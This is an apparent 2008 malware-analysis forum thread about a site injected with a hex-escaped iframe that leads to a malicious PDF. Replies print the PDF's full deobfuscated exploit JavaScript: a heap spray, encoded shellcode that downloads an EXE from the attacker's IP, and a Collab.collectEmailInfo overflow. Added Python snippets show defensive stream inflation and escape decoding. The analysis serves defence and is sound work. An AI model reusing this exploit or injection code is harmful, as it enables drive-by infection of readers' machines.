Author Topic: Javascript Unescaping  (Read 11168 times)


November 18, 2008, 09:18:31 pm

boswarez

I have been seeing a lot of sites using unescape in iframes lately. Here is an example.
Take hxxp://www.gambas.it for example.

There are 2 places where they are using unescape: once to call the url in a frameset using a document.write statement, and the other to call it outside of the frameset.
Here it is:

Code:
<script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x32\x30\x33\x2E\x39\x32\x2E\x31\x33\x32\x2F\x64\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script>
The deobfuscated text is as follows:
Code:
http://91.203.92.132/d/index.php
How about a little further investigation...
Next thing I noticed is that it points to
Code:
http://91.203.92.132/d/cache/doc.pdf
through an iframe. That pdf file is of course more than just a pdf.

After running strings in console on my slackware box, you can clearly see what is going on.

Code:
[novalok@host tulprod001.combine]$ strings doc.pdf
%PDF-1.3
1 0 obj
<</OpenAction <</JS (this.vcfcd208495d565e\(\))
/S /JavaScript
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
endobj
2 0 obj
endobj
3 0 obj
<</Type /Outlines
/Count 0
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Type /Pages
/Count 1
endobj
5 0 obj
<</Fields []
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/MediaBox [0 0 595.28000 841.89000]
/TrimBox [0 0 595.28000 841.89000]
/Resources 8 0 R
/Type /Page
/Contents 11 0 R
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
endobj
11 0 obj
<</Filter /FlateDecode
/Length 36
stream
3P0P0
000P
endstream
endobj
13 0 obj
<</Filter /FlateDecode
/Length 3295
stream
p@      H{
}VIT
Og7=
AF[c
gEH@W
i4'd!
#$`R@$g
"Rdb
GS W
p'nz.
Aa7F
ldtr
o0b4
tR.Ai
:~37
89/DL
wI9I9JG2
endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000262 00000 n
0000000280 00000 n
0000000325 00000 n
0000000398 00000 n
0000000429 00000 n
0000000449 00000 n
0000000488 00000 n
0000000554 00000 n
0000000715 00000 n
0000000765 00000 n
0000001941 00000 n
0000000872 00000 n
0000001988 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
startxref
2189
%%EOF

If you haven't already, please update your version of Adobe Reader as it executes javascript that it shouldn't.
Any questions, just hit me up

November 18, 2008, 09:32:20 pm
Reply #1

bobby

That is a wrong way to analyze a PDF file, and your results are not conclusive.
You should inflate the stream from that PDF, to see what you have hidden in the stream.

After you get the decompressed stream, you should take a look what the shellcode from the stream does.
The shellcode downloads the following EXE file:
91.203.92.132/d/load.php?pdf=72b32a1f754ba1c09b3695e0cb6cde7f
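
Added example, not part of the original thread: the inflate step described in the reply above, done in Python on a constructed, harmless PDF-like sample that mirrors the /OpenAction and FlateDecode objects from the first post. The function names, the hint strings and the sample file are assumptions made for illustration.

```python
import re
import zlib

# Illustrative names throughout; none of this comes from the thread.
# Name keys that make a reader run script when the file is opened.
ACTIVE_KEY_RE = re.compile(rb"/(OpenAction|JavaScript|JS|AA)\b")
# Body between "stream" and "endstream", minus the end-of-line markers.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)
SCRIPT_HINTS = (b"unescape(", b"%u", b"eval(", b"app.viewerVersion")


def inflate_streams(pdf_bytes):
    """Yield (offset, decoded bytes or None) for each stream in the file."""
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj() tolerates trailing or slightly truncated data.
            decoded = zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            decoded = None  # not FlateDecode, or too damaged to inflate
        yield match.start(), decoded


def triage(pdf_bytes):
    """Report active-content keys and decoded streams that look like script."""
    keys = sorted({m.group(1).decode() for m in ACTIVE_KEY_RE.finditer(pdf_bytes)})
    scripts = [(off, data.decode("latin-1"))
               for off, data in inflate_streams(pdf_bytes)
               if data and any(hint in data for hint in SCRIPT_HINTS)]
    return {"active_keys": keys, "scripts": scripts}


def build_sample():
    """Constructed, harmless file mirroring the objects seen in the post."""
    body = zlib.compress(b'var s = unescape("%u4141%u4141"); // constructed')
    return (b"%PDF-1.3\n1 0 obj\n<</OpenAction <</JS 13 0 R /S /JavaScript>>"
            b" /Type /Catalog>>\nendobj\n13 0 obj\n<</Filter /FlateDecode /Length "
            + str(len(body)).encode() + b">>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    report = triage(build_sample())
    print("active keys:", report["active_keys"])
    for offset, text in report["scripts"]:
        print("stream at offset", offset, "->", text)
```

Real files can hide these keys with #xx name escapes or inside object streams, so an empty result is not proof that a file is clean.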

November 18, 2008, 09:38:51 pm
Reply #2

boswarez

well i did as much as i possibly could on a linux box without wine.
And btw I did nothing wrong you idiot. how dare you say i do things the wrong way. everyone's analysis process is different. next time you decide to post, why not think about what you say first.

November 18, 2008, 09:50:19 pm
Reply #3

MysteryFCM

First and foremost, being abusive to others on this board is NOT in your best interests if you want to continue being welcome here. I suggest, next time someone offers you constructive criticism, that YOU think before YOU post.

Secondly, you DID do something wrong;

1. As far as your post, you should ALWAYS delinkify a malicious URL. This both prevents search engines picking it up, and prevents users accidentally clicking it.

2. You DID NOT correctly perform analysis on the malicious PDF. Using a Linux box, you actually have MUCH better tools you could use for the analysis;

http://www.sudosecure.net/archives/313

Using a Windows box, Bobby outlined the method at;

http://www.malwaredomainlist.com/forums/index.php?topic=2139.0
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

November 18, 2008, 09:50:41 pm
Reply #4

philipp

Quote
well i did as much as i possibly could on a linux box without wine.
And btw I did nothing wrong you idiot. how dare you say i do things the wrong way. everyone's analysis process is different. next time you decide to post, why not think about what you say first.

1. you could have used pdftk on your 'linux box' to get the javascript:
Code:
{
var vc4ca4238a0b9238 = new Array();

function vc81e728d9d4c2f6(veccbc87e4b5ce2f, va87ff679a2f3e71)
{
while (veccbc87e4b5ce2f.length * 2 < va87ff679a2f3e71)
{
veccbc87e4b5ce2f += veccbc87e4b5ce2f;
}

veccbc87e4b5ce2f = veccbc87e4b5ce2f.substring(0, va87ff679a2f3e71 / 2);

return veccbc87e4b5ce2f;
}

function ve4da3b7fbbce234()
{
var v1679091c5a880fa = 0x0c0c0c0c;

var v8f14e45fceea167 = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u392F%u2E31%u3032%u2E33%u3239%u312E%u3233%u642F%u6C2F%u616F%u2E64%u6870%u3F70%u6470%u3D66%u3237%u3362%u6132%u6631%u3537%u6234%u3161%u3063%u6239%u3633%u3539%u3065%u6263%u6336%u6564%u6637");

var vc9f0f895fb98ab9 = 0x400000;

var v45c48cce2e2d7fb = v8f14e45fceea167.length * 2;

var va87ff679a2f3e71 = vc9f0f895fb98ab9 - (v45c48cce2e2d7fb + 0x38);

var veccbc87e4b5ce2f = unescape("%u9090%u9090");

veccbc87e4b5ce2f = vc81e728d9d4c2f6(veccbc87e4b5ce2f, va87ff679a2f3e71);

var vd3d9446802a4425 = (v1679091c5a880fa - 0x400000) / vc9f0f895fb98ab9;

for (var v6512bd43d9caa6e = 0; v6512bd43d9caa6e < vd3d9446802a4425; v6512bd43d9caa6e++)
{
vc4ca4238a0b9238[v6512bd43d9caa6e] = veccbc87e4b5ce2f + v8f14e45fceea167;
}
}


function vc20ad4d76fe9775()
{
var vc51ce410c124a10 = app.viewerVersion.toString();

vc51ce410c124a10 = vc51ce410c124a10.replace(/\D/g, "");

var vaab3238922bcc25 = new Array(vc51ce410c124a10.charAt(0), vc51ce410c124a10.charAt(1), vc51ce410c124a10.charAt(2));

if ((vaab3238922bcc25[0] == 8 && ((vaab3238922bcc25[1] == 1 && vaab3238922bcc25[2] < 2) || vaab3238922bcc25[1] < 1)) || (vaab3238922bcc25[0] == 7 && vaab3238922bcc25[1] < 1) || (vaab3238922bcc25[0] < 7))
{
ve4da3b7fbbce234();

var v9bf31c7ff062936 = unescape("%u0c0c%u0c0c");

while(v9bf31c7ff062936.length < 44952) v9bf31c7ff062936 += v9bf31c7ff062936;

this.collabStore = Collab.collectEmailInfo({subj: "", msg: v9bf31c7ff062936});
}
}

vc20ad4d76fe9775();
}

2. then you could have easily decoded the shellcode with perl to get the url:
Code:
http://91.203.92.132/d/load.php?pdf=72b32a1f754ba1c09b3695e0cb6cde7f

3. don't call others 'idiots' when you don't know what you are talking about

4. you better go search another community and try to show off there ;)
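
Added example, not part of the original posts: static decoding of the two encodings seen in this thread, written in Python rather than the perl mentioned above, with illustrative function names and a constructed sample string. The `\xNN` escapes in the first post are resolved by the JavaScript parser itself, while `unescape()` handles the `%uXXXX` form; each `%uXXXX` unit sits in memory low byte first, which is why `%u7468%u7074` reads as "http".

```python
import re
import struct

# Illustrative names; the sample below is constructed, not from the thread.
ESCAPE_RE = re.compile(
    r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|\\x([0-9A-Fa-f]{2})")


def unescape_to_bytes(text):
    """Decode %uXXXX, %XX and backslash-x escapes without running any script."""
    out, pos = bytearray(), 0
    for m in ESCAPE_RE.finditer(text):
        out += text[pos:m.start()].encode("latin-1", "replace")
        if m.group(1):
            # %uXXXX is one 16-bit unit; it sits in memory low byte first.
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            # Single-byte escapes stay one byte, which suits decoded markup.
            out.append(int(m.group(2) or m.group(3), 16))
        pos = m.end()
    out += text[pos:].encode("latin-1", "replace")
    return bytes(out)


def extract_urls(text):
    """Return URLs found in the decoded bytes, as a strings pass would."""
    found = re.findall(rb"https?://[\x21-\x7e]+", unescape_to_bytes(text))
    return [url.decode("ascii") for url in found]


def encode_u(raw):
    """Helper for the constructed sample: bytes to %uXXXX notation."""
    raw += b"\x00" * (len(raw) % 2)
    return "".join("%%u%04x" % v for (v,) in struct.iter_unpack("<H", raw))


# Constructed sample: four filler bytes, then a placeholder URL.
SAMPLE = encode_u(b"\x01\x02\x03\x04"
                  b"http://sample.invalid/d/load.php?pdf=constructed")

if __name__ == "__main__":
    print(SAMPLE[:36] + "...")
    print(extract_urls(SAMPLE))
```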

November 18, 2008, 09:57:28 pm
Reply #5

sowhat-x

Quote
next time you decide to post, why not think about what you say first.

I agree 100% with that part -> banned for flaming towards other members.

Quote
how dare you say i do things the wrong way.
Well, what can we do for that now... what's done, is done... he actually dared...  ;D

PS: By the way, I see you've been a quite 'naughty boy' out there in the net...

November 18, 2008, 10:00:24 pm
Reply #6

bobby

@boswarez
Even if you call me idiot, I will not be mad about that. Nah, I have survived wars, I will survive this too.
My English is far from perfect, and I can't express the right way my exact thoughts.
I just wanted to point you to the weak points of your analysis.
I can compile some of my tools for Linux if needed, but that is for another topic.

November 18, 2008, 10:11:06 pm
Reply #7

sowhat-x

Lol, bobby... I would even place a bet this would gonna happen...
as all people around more or less are friendly towards newcomers.
This guy though...except from having an "attitude",
also seems to have been a bit naughty out there...   ;)